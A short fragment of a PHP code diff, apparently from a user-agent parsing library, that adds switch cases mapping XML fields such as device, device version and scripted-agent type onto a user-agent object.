$userAgentString->setDevice((string)$child[0]); + break; + case "device_version": + $userAgentString->setDeviceVersion((string)$child[0]); + break; + case "scripted_agent": + $userAgentString->setScriptedAgent((string)$child[0]); + break; + case "scripted_agent_type": + $userAgentString->setScriptedAgentType((string)$child[0]); + break; + case "string": + $userAgentString->setString(str_replace(array(PHP_EOL, ' '), ' ', (string)(string)$child[0])); + break; + } + } $collection[] = $userAgentString; }